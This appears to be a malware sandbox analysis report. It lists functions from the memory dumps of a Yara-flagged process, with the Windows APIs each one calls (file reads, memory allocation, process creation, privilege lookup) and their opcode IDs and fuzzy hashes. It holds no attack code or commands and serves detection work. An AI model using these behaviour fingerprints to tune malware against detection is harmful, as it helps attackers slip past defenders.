                                      • Instruction Fuzzy Hash: 03F0E2B2200108ABDB14DF98CC84EEB77A9EF8C754F158248BA1DA7241CA30E911CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F49E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(00F44D42,5EB6522D,FFFFFFFF,00F44A01,?,?,00F44D42,?,00F44A01,FFFFFFFF,5EB6522D,00F44D42,?,00000000), ref: 00F49E55
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 8dec035832da5541619a815204b1b9cf3fc39878f5c38e80ed98e3035284770a
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 02F0B7B2200208AFDB14DF89DC81EEB77ADEF8C754F158248BE1DA7241D630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F49F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F32D11,00002000,00003000,00000004), ref: 00F49F79
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: d29dbe4bc9e9aa57376b734276675ecd486f7a0cebb4a0dbb4afd6887383c5a6
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 60F015B2200208ABDB14DF89CC81EAB77ADEF88750F118148BE08A7241C630F810CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F49E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(00F44D20,?,?,00F44D20,00000000,FFFFFFFF), ref: 00F49EB5
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: ac13d0c688c96571ea377d77bf115a05989e361fd53b04abec1d7facdb136e15
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 0FD012752402147BD710EB98CC85E977B5CEF44750F154455BA585B242C530F50086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F49E8F, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(00F44D20,?,?,00F44D20,00000000,FFFFFFFF), ref: 00F49EB5
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: de0a87add22e456857abe52870cdbadee32c2947aa417bc47def53d5c8f1c4f8
                                      • Instruction ID: 25591668773274e7504d533a1fa649fd0e14a1c1e42309ee7985885c42459592
                                      • Opcode Fuzzy Hash: de0a87add22e456857abe52870cdbadee32c2947aa417bc47def53d5c8f1c4f8
                                      • Instruction Fuzzy Hash: DCE0C231200104BFE720DFA4CC85EDB7B28EF44350F118158B90CAB242C530E500CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1237f5feea82adfe7546d374c1a9cdf6150ac119e23e156f735832c9edccb824
                                      • Instruction ID: 0c83517f6c4ab81139625dc047afc3c8cf669f41fb43b22969e6e967250f06ef
                                      • Opcode Fuzzy Hash: 1237f5feea82adfe7546d374c1a9cdf6150ac119e23e156f735832c9edccb824
                                      • Instruction Fuzzy Hash: E49002A9211000030509A5590745507005697D5391391C431F1045550CD6618C6165B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5c9e2cae9eaf919acae6cafed35eb0a25e91b9a69904002b328f096afc824b13
                                      • Instruction ID: 6ded881091c4c7bd3ecec4f1ef0280f5ffc13093a85b7175a582a978961c48c3
                                      • Opcode Fuzzy Hash: 5c9e2cae9eaf919acae6cafed35eb0a25e91b9a69904002b328f096afc824b13
                                      • Instruction Fuzzy Hash: C99002E520200003450971594555616401A97E0241B91C431E1044590DC5658C9175B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 31ce94e41230b292c34b3f56ff9df919599615370bf56d4a3f3f9863b1712ba5
                                      • Instruction ID: 5b2724fa9630ee97306aea7caf5cf9948dfb977a9c189dee0774b8a3b9a5eaf5
                                      • Opcode Fuzzy Hash: 31ce94e41230b292c34b3f56ff9df919599615370bf56d4a3f3f9863b1712ba5
                                      • Instruction Fuzzy Hash: 6E9002B520100402D50465995549646001597E0341F91D421A5054555EC6A58C9175B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c9c4c61a80f0499571f64534e3bba9086d6bfffee17025fde466507829f238e6
                                      • Instruction ID: 444e5e3c5aa92114680be1841cb19f1c5dd3ab560dddc67b61f74be79d2e9b9c
                                      • Opcode Fuzzy Hash: c9c4c61a80f0499571f64534e3bba9086d6bfffee17025fde466507829f238e6
                                      • Instruction Fuzzy Hash: 5C9002AD21300002D5847159554960A001597D1242FD1D825A0045558CC9558C6967B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 49a17059567a6869d3d383186790f8d21f746b9919e65ccbacaa6224fdb063b2
                                      • Instruction ID: d995e21164e42789cc5d5147a4046617222dfc3ef71e82f1eb7df1887b60dfd4
                                      • Opcode Fuzzy Hash: 49a17059567a6869d3d383186790f8d21f746b9919e65ccbacaa6224fdb063b2
                                      • Instruction Fuzzy Hash: 9F9002B531114402D51461598545706001597D1241F91C821A0854558D86D58C9175B2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 69f8e859af2ba532fce55e3e7da5830f559c5df00b567373741b257324a7e61f
                                      • Instruction ID: 7afd17e4294816f16b9c5baade19b4be529684956f0cf8815aee395e86bd4ce0
                                      • Opcode Fuzzy Hash: 69f8e859af2ba532fce55e3e7da5830f559c5df00b567373741b257324a7e61f
                                      • Instruction Fuzzy Hash: B69002B520100802D5847159454564A001597D1341FD1C425A0055654DCA558E597BF1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1940fa7fec344d070942ba77eee640d87e4b3493cfa4abeec3a7befba999cdfa
                                      • Instruction ID: f431133fb802c98712debcab56a302d01adc09f90cad63ed562b5282b2e77b85
                                      • Opcode Fuzzy Hash: 1940fa7fec344d070942ba77eee640d87e4b3493cfa4abeec3a7befba999cdfa
                                      • Instruction Fuzzy Hash: BD9002B520504842D54471594545A46002597D0345F91C421A0094694D96658D55BAF1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8fb0b6bc8162209ef8384b0d080a3548b99835d4c8c0cf4556e6696b3524dbe8
                                      • Instruction ID: 4d0f2d3f66171145d7f0841193fb032b748efca8fe206d0e52e3882ed65b8ff1
                                      • Opcode Fuzzy Hash: 8fb0b6bc8162209ef8384b0d080a3548b99835d4c8c0cf4556e6696b3524dbe8
                                      • Instruction Fuzzy Hash: E79002B520108802D5146159854574A001597D0341F95C821A4454658D86D58C9175B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cf6761a0be4de4215dfe1bf95abbcbe0aa51e684255c0b48bd5094b4f2c71a05
                                      • Instruction ID: e594bdaf8afd185bef73adb6680141eaad6268777f651621b3d9fea689213c8b
                                      • Opcode Fuzzy Hash: cf6761a0be4de4215dfe1bf95abbcbe0aa51e684255c0b48bd5094b4f2c71a05
                                      • Instruction Fuzzy Hash: 1E9002B520100842D50461594545B46001597E0341F91C426A0154654D8655CC5179B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 78a7366be1b6c9cd3e49bc5f63673776927f3aebb6e4c5d66fc10e553d4dec8e
                                      • Instruction ID: 2609513c0a14c12497ebdb77c79d0baba534e7fcd5469dfb7d11fd4cd16e8650
                                      • Opcode Fuzzy Hash: 78a7366be1b6c9cd3e49bc5f63673776927f3aebb6e4c5d66fc10e553d4dec8e
                                      • Instruction Fuzzy Hash: 589002F520100402D54471594545746001597D0341F91C421A5094554E86998DD57AF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9e5f8dc2d3f766afb0965b680cea2753f884965e438444fed788e70e1831528a
                                      • Instruction ID: ec1c60e01788947cd9a7ff2c6723ffa39917f6682eb1c470d78b24a9fc7cf7e6
                                      • Opcode Fuzzy Hash: 9e5f8dc2d3f766afb0965b680cea2753f884965e438444fed788e70e1831528a
                                      • Instruction Fuzzy Hash: 989002E534100442D50461594555B060015D7E1341F91C425E1094554D8659CC5275B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: f6b0ee429a7092af9fcbeff3d5ffa5408ac83061cfd0c4208c9a2abca1397fbf
                                      • Instruction ID: 43416ab0dc2f17d4765f1e4ebbef4d2217678a0606d491d00de42d00cd7d775a
                                      • Opcode Fuzzy Hash: f6b0ee429a7092af9fcbeff3d5ffa5408ac83061cfd0c4208c9a2abca1397fbf
                                      • Instruction Fuzzy Hash: 0E9002B520100413D51561594645707001997D0281FD1C822A0454558D96968D52B5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 63a3121947516df57770c810655db95a2628f72ff0aa618dedd4a1d8b6ed183c
                                      • Instruction ID: d76031e8819fd5d66a2c191b3b62e58f1ba1cba371763fdd7e3bdc78bb4a2fd9
                                      • Opcode Fuzzy Hash: 63a3121947516df57770c810655db95a2628f72ff0aa618dedd4a1d8b6ed183c
                                      • Instruction Fuzzy Hash: 159002A5242041525949B15945455074016A7E02817D1C422A1444950C85669C56EAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05389A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4bc34bff12052a078cb8433209ba5a66d735281e6114fce10c0ef79c2ca7b2c5
                                      • Instruction ID: 52d6842997659320249c93c9b0bf0fc2577ad3196fa7f540a9bfd2adb69229e7
                                      • Opcode Fuzzy Hash: 4bc34bff12052a078cb8433209ba5a66d735281e6114fce10c0ef79c2ca7b2c5
                                      • Instruction Fuzzy Hash: E49002A521180042D60465694D55B07001597D0343F91C525A0184554CC9558C6169B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F4A066, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00F33AF8), ref: 00F4A09D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: f4337fe77560981ffbdf91ae04331d89af6cc2fbcee1e69a0dcfd809e590df10
                                      • Instruction ID: ca1b115be4238dd7b981397f7e423d96570b785e3fbdf473270007035f3373f9
                                      • Opcode Fuzzy Hash: f4337fe77560981ffbdf91ae04331d89af6cc2fbcee1e69a0dcfd809e590df10
                                      • Instruction Fuzzy Hash: B4F0AFB66442047FDB20EFA8DC85EE77BA8DF84310F118559FD4DAB342C631E9148BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F4A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00F33AF8), ref: 00F4A09D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: f15c6f12b036ed8671f4299652715ae5a87190c3fd95972b1340097aeff8b43c
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: CEE01AB12002086BD714DF59CC45EA777ACEF88750F018554BD0857241C630E9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F382E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00F3834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00F3836B
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: d5cb27abf99f798cb6fd9ade7d1c3d6ce644971d62333bc3d1c4c609b48c0965
                                      • Instruction ID: 2532380b9f3bf6aeb559d440f693e8331eb73945579c2b0f45e6fa9b1fbac452
                                      • Opcode Fuzzy Hash: d5cb27abf99f798cb6fd9ade7d1c3d6ce644971d62333bc3d1c4c609b48c0965
                                      • Instruction Fuzzy Hash: 0801AC31A4032977F720A6A59D43FBE762CAB40F61F054114FF04BA2C1D6D8690657F5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F382F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00F3834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00F3836B
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                      • Instruction ID: dcd06cd59dddb59e8cf1d132d4d615f38572f338bd47f99cf13a040e0936070b
                                      • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                      • Instruction Fuzzy Hash: 4401A731A803287BE720A6959C43FBE776C6B40F61F054114FF04BA1C1E6D8690656F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F4A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00F4A134
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: 0dcbc51067f2cb20b213e9640077dce734cf51614e01023d7c1e8ccba5b8bd94
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 7001B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F4A241, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F3F1A2,00F3F1A2,?,00000000,?,?), ref: 00F4A200
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                      • Instruction ID: 315dcc960265a9444f0aef44dcb62cbd0a5e93d25318e60ee630904724bbe6cb
                                      • Opcode Fuzzy Hash: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                      • Instruction Fuzzy Hash: E0F0E5341092D46BE322EB74A8C04E6BF94DF8212832846DEECE84B107C626954B9B52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F4A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00F44506,?,00F44C7F,00F44C7F,?,00F44506,?,?,?,?,?,00000000,00000000,?), ref: 00F4A05D
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 43fc2c238a8883b717116ebc59704266498e49721577c30ce01beca153934acd
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: E0E012B1200208ABDB14EF99CC81EA777ACEF88650F118558BE086B242C630F9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F4A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F3F1A2,00F3F1A2,?,00000000,?,?), ref: 00F4A200
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: b6af663a57d2a1f5f8d220f10e2fd037e71fb9780fa7d1ec6f20582165f71360
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: B1E01AB12002086BDB10DF49CC85EE737ADEF88650F018154BE0867241C934E8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F3F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00F38CF4,?), ref: 00F3F6CB
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                      • Instruction ID: ce99cc1a0c15b6f06d4884fd1306f1ce435fe971591f9b864c3e44bb1111b504
                                      • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                      • Instruction Fuzzy Hash: 7BD0A771B903043BE610FBA49C03F2632CD6B44B10F490074FA48E73C3D954F4004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0538967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 246a86d5330bd7283100838a1189c2ba8c5cca116b0086dd58e6a538c4608b9f
                                      • Instruction ID: 2aef33a37b9e9e7fad71a9b5e4db38c2924a756533d822112ee7eee0d8bc568c
                                      • Opcode Fuzzy Hash: 246a86d5330bd7283100838a1189c2ba8c5cca116b0086dd58e6a538c4608b9f
                                      • Instruction Fuzzy Hash: E8B09BB29015C5C5DA15E7604708B37791177D0751F56C461D1060641A4778C491F5F5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

